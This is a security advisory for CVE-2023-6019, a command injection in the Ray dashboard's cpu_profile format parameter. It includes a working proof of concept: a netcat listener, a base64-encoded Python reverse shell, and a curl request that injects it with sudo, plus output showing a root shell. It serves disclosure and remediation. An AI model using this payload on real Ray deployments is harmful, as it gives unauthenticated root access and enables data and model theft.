Headline
CVE-2023-6019: Code injection in cpu_profile format parameter in ray
A command injection exists in Ray’s cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.
Description
The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned:
Proof of Concept
For this proof of concept, the attacker machine is 192.168.200.177 and the victim Ray dashboard is 192.168.200.204.
****Victim Ray dashboard ray_dashboard.py (192.168.200.204)****
#!/usr/bin/env python3
import ray
context = ray.init(dashboard_host="0.0.0.0")
print(context.dashboard_url)
and run like so:
python3 -i ray_dashboard.py
****Attacker machine (192.168.200.177)****
user@attacker:~$ nc -lvvp 4444 &
Listening on 0.0.0.0 4444
# python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.177",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])' == cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn
user@attacker:~$ curl 'http://192.168.200.204:8265/worker/cpu_profile?pid=3354&ip=192.168.200.204&duration=5&native=0&format=`echo%20cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMjAwLjE3NyIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkn|base64$IFS-d|sudo%20sh`'
Connection received on 192.168.200.204 57436
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# hostname
ray
Impact
Exploiting this vulnerability allows for a complete remote compromise of the system running the Ray dashboard, including model theft & alteration, total data compromise, and persistent access to an attacker. Ray has specific setup cases for setup with a passwordless sudo, giving the attacker root access. If Ray is not configured for passwordless sudo, the attacker will receive access in the same account the dashboard was run. Both allow for model model theft & alteration, total data compromise, and persistent access to an attacker.
Occurrences
profile_manager.py L86-L114
This is the vulnerable function containing the unverified format parameter. Allow-listing this to a boolean, known good values, or a highly filtered string type will fix this vulnerability
Related news
The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned. Versions 2.6.3 and below are affected.